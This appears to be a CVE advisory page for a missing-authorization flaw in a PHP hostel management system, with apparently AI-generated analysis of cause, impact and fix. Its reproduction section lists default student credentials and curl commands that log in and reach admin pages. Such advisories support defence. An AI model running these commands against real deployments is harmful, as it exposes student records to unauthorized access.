CVE-2026-10815
Description
A missing authorization vulnerability in Hostel Management System PHP allows ordinary users to access sensitive admin functionalities.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A missing authorization vulnerability in Hostel Management System PHP allows ordinary users to access sensitive admin functionalities.
Vulnerability
A missing authorization vulnerability exists in the Hostel Management System PHP application up to commit f87e67c283bab6f718faf2fec6ae39a13bd7036b. The issue resides in the hostel/index.php and hostel/admin/includes/checklogin.php files. After a normal user logs in, their session ID is stored in $_SESSION['id']. The admin authorization check in checklogin.php only verifies that $_SESSION['id'] is not empty, without confirming if the session actually belongs to an administrator. This affects all versions of the project as it does not use versioning.
Exploitation
An attacker with an ordinary user account can exploit this vulnerability remotely. After logging in as a regular student user, the attacker can then directly access administrative pages such as the dashboard, student management, room creation, and course management pages by manipulating the ID argument and leveraging their existing authenticated session. The proof of concept demonstrates using curl to log in as a student and then accessing these admin pages [1].
Impact
Successful exploitation allows an ordinary authenticated user to gain unauthorized access to administrative functionalities. This includes viewing the admin dashboard, managing student records, and accessing course and room management pages, which could lead to data manipulation or unauthorized disclosure of sensitive information within the hostel management system [1].
Mitigation
Not yet disclosed in the available references. The project was informed of the problem early through an issue report but has not responded yet, and no fixed version or workaround has been published. The project does not use versioning, making it difficult to identify unaffected releases [1].
AI Insight generated on Jun 4, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2(expand)+ 1 more
- (no CPE)
- (no CPE)range: up to f87e67c283bab6f718faf2fec6ae39a13bd7036b
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The system fails to properly authorize users, allowing ordinary users to access administrative functions."
Attack vector
An attacker can exploit this vulnerability by first logging in as a normal user. The system sets a session variable `$_SESSION['id']` upon successful login. Subsequently, the attacker can directly access administrative pages, such as the dashboard or student management pages, by navigating to their URLs. The administrative pages only check if `$_SESSION['id']` is non-empty, without verifying if the logged-in user is an administrator [ref_id=1]. This allows remote exploitation.
Affected code
The vulnerability resides in the authentication and authorization logic of the Hostel-Management-System-PHP. Specifically, the file `hostel/index.php` sets `$_SESSION['id']` upon a normal user login. The administrative check in `hostel/admin/includes/checklogin.php` only verifies if `strlen($_SESSION['id'])==0`, which is insufficient for proper authorization [ref_id=1].
What the fix does
The advisory suggests implementing a more robust authorization mechanism. This involves using separate session variables for regular users and administrators, such as `$_SESSION['user_id']` and `$_SESSION['admin_id']`. Administrative pages should then verify the existence and validity of `$_SESSION['admin_id']` and enforce role checks before any administrative operations are performed. The project has not yet responded to the issue report, so a patch is not available [ref_id=1].
Preconditions
- authThe attacker must be an authenticated ordinary user.
- networkThe attacker must be able to reach the application over the network.
Reproduction
Using the default ordinary user from hostel.sql:
Email: rohansharma@gmail.com
Password: rohansharma
$cookie = "$env:TEMP\hostel_user_cookie.txt"
curl.exe -s -i -c $cookie -b $cookie -X POST \ -d "emailreg=rohansharma@gmail.com&password=rohansharma&login=login" \ http://hostel.com/index.php
curl.exe -s -i -b $cookie http://hostel.com/admin/dashboard.php curl.exe -s -i -b $cookie http://hostel.com/admin/manage-students.php curl.exe -s -i -b $cookie http://hostel.com/admin/create-room.php curl.exe -s -i -b $cookie http://hostel.com/admin/add-courses.php
Verified Result: After logging in as an ordinary student user:
/admin/dashboard.php returns HTTP/1.1 200 OK /admin/manage-students.php returns HTTP/1.1 200 OK /admin/create-room.php returns HTTP/1.1 200 OK /admin/add-courses.php returns HTTP/1.1 200 OK [ref_id=1]
Generated on Jun 4, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5News mentions
0No linked articles in our index yet.